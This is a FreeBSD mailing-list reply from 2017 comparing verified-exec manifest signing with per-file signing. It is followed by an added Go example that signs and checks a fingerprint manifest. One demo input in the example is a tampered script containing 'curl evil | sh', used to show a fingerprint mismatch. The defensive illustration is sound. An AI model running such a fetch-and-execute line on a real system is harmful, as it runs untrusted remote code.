Date: Mon, 23 Oct 2017 15:53:05 -0700
From: "Simon J. Gerraty" <sjg@juniper.net>
To: Eric McCorkle <eric@metricspace.net>
Cc: Ian Lepore <ian@freebsd.org>, "freebsd-hackers@freebsd.org" <freebsd-hackers@freebsd.org>, <freebsd-security@freebsd.org>, <freebsd-arch@freebsd.org>, <sjg@juniper.net>
Subject: Re: Trust system write-up
Message-ID: <72903.1508799185@kaos.jnpr.net>
In-Reply-To: <e4fb486c-fe8a-571e-8c95-f5f68c44b77c@metricspace.net>
References: <1a9bbbf6-d975-0e77-b199-eb1ec0486c8a@metricspace.net> <1508775285.34364.2.camel@freebsd.org> <e4fb486c-fe8a-571e-8c95-f5f68c44b77c@metricspace.net>
Eric McCorkle <eric@metricspace.net> wrote:
> > Any thoughts on how to validate executables which are not elf binaries,
> > such as shell scripts, python programs, etc?
>
> I hadn't really thought in depth about it, as my main initial goal is
> signed kernel/modules, but I have given it some thought...
>
> An alternative is something like the NetBSD veriexec framework, where

Yes, as previously mentioned the verified exec model deals with this
neatly, and btw is more efficient than signing individual files - as is
needed with ELF signing etc. I think for Linux-based platforms using IMA
we need to generate 20-30k+ signatures, vs about a dozen for platforms
using verified exec; verification is also more expensive, I'm told.

> there's MACs for specific files. That stuff is mostly orthogonal to the
> public-key approach I'm working on here, but there's possibly some
> interplay.

Yes, you use the public key stuff to sign the manifests containing the
blessed fingerprints. This is what Junos has been doing for more than a
decade.

Your "trust" database might be useful in being able to extend that to
general use. The trust model we use for Junos is deliberately very
restrictive and thus of most use to embedded vendors.
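The manifest-signing model Simon describes above (one public-key signature over a list of blessed fingerprints, instead of a signature on every file), as an added example that is not part of this thread and is not Junos or NetBSD veriexec code. It assumes ed25519 for the manifest signature and SHA-256 as the fingerprint; the "path sha256hex" line format, the type and function names, and the sample files are all constructed for illustration.

```go
package main

import (
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"sort"
	"strings"
)

// Manifest is a single signed list of "path sha256hex" lines, in the spirit of
// a verified-exec fingerprint file (hypothetical format). Only the manifest
// carries a signature; the files it lists do not, unlike per-file ELF or IMA
// signing where every file needs its own.
type Manifest struct {
	Body []byte // canonical text that was signed
	Sig  []byte // ed25519 signature over Body
}

// ErrBadManifestSig is returned when the manifest signature does not verify.
var ErrBadManifestSig = errors.New("manifest signature invalid")

// Fingerprint returns the hex SHA-256 of a file's contents.
func Fingerprint(content []byte) string {
	sum := sha256.Sum256(content)
	return hex.EncodeToString(sum[:])
}

// BuildManifest fingerprints every file, emits the lines in sorted order so
// the signed bytes are reproducible, and signs the whole list exactly once.
func BuildManifest(priv ed25519.PrivateKey, files map[string][]byte) Manifest {
	paths := make([]string, 0, len(files))
	for p := range files {
		paths = append(paths, p)
	}
	sort.Strings(paths)
	var sb strings.Builder
	for _, p := range paths {
		fmt.Fprintf(&sb, "%s %s\n", p, Fingerprint(files[p]))
	}
	body := []byte(sb.String())
	return Manifest{Body: body, Sig: ed25519.Sign(priv, body)}
}

// Verifier holds fingerprints taken from a manifest whose signature checked
// out against the trusted public key.
type Verifier struct {
	trusted map[string]string
}

// LoadManifest performs the one public-key operation: verify the manifest
// signature, then parse the fingerprints it vouches for. A forged or edited
// manifest, or one signed by another key, is rejected here.
func LoadManifest(pub ed25519.PublicKey, m Manifest) (*Verifier, error) {
	if !ed25519.Verify(pub, m.Body, m.Sig) {
		return nil, ErrBadManifestSig
	}
	v := &Verifier{trusted: make(map[string]string)}
	for _, line := range strings.Split(string(m.Body), "\n") {
		if line == "" {
			continue
		}
		f := strings.Fields(line)
		if len(f) != 2 {
			return nil, fmt.Errorf("malformed manifest line %q", line)
		}
		v.trusted[f[0]] = f[1]
	}
	return v, nil
}

// CheckExec is what a strict verified-exec hook decides at exec time: a path
// absent from the manifest, or whose contents hash differently, is refused.
// This covers scripts as well as ELF, and costs one hash, no signature check.
func (v *Verifier) CheckExec(path string, content []byte) error {
	want, ok := v.trusted[path]
	if !ok {
		return fmt.Errorf("%s: not in signed manifest", path)
	}
	if got := Fingerprint(content); got != want {
		return fmt.Errorf("%s: fingerprint mismatch", path)
	}
	return nil
}

func main() {
	pub, priv, err := ed25519.GenerateKey(nil) // nil reader selects crypto/rand
	if err != nil {
		panic(err)
	}
	// Constructed stand-ins for one binary and two non-ELF executables.
	files := map[string][]byte{
		"/bin/sh":                  []byte("\x7fELF...sh"),
		"/usr/local/bin/deploy.sh": []byte("#!/bin/sh\necho deploy\n"),
		"/usr/local/bin/report.py": []byte("print('report')\n"),
	}
	m := BuildManifest(priv, files)
	fmt.Printf("%d files, 1 signature:\n%s", len(files), m.Body)
	v, err := LoadManifest(pub, m)
	if err != nil {
		panic(err)
	}
	fmt.Println(v.CheckExec("/usr/local/bin/deploy.sh", files["/usr/local/bin/deploy.sh"]))
	fmt.Println(v.CheckExec("/usr/local/bin/deploy.sh", []byte("#!/bin/sh\ncurl evil | sh\n")))
	fmt.Println(v.CheckExec("/tmp/unlisted.sh", []byte("#!/bin/sh\n")))
}
```

The signature count is what the thread is comparing: for a tree of N executables, per-file signing produces and later verifies N signatures, while this model signs the manifest once and then does a hash lookup per exec. The strict "not in manifest means refused" branch is the restrictive Junos-style policy Simon mentions; a laxer deployment would log and allow unlisted files instead.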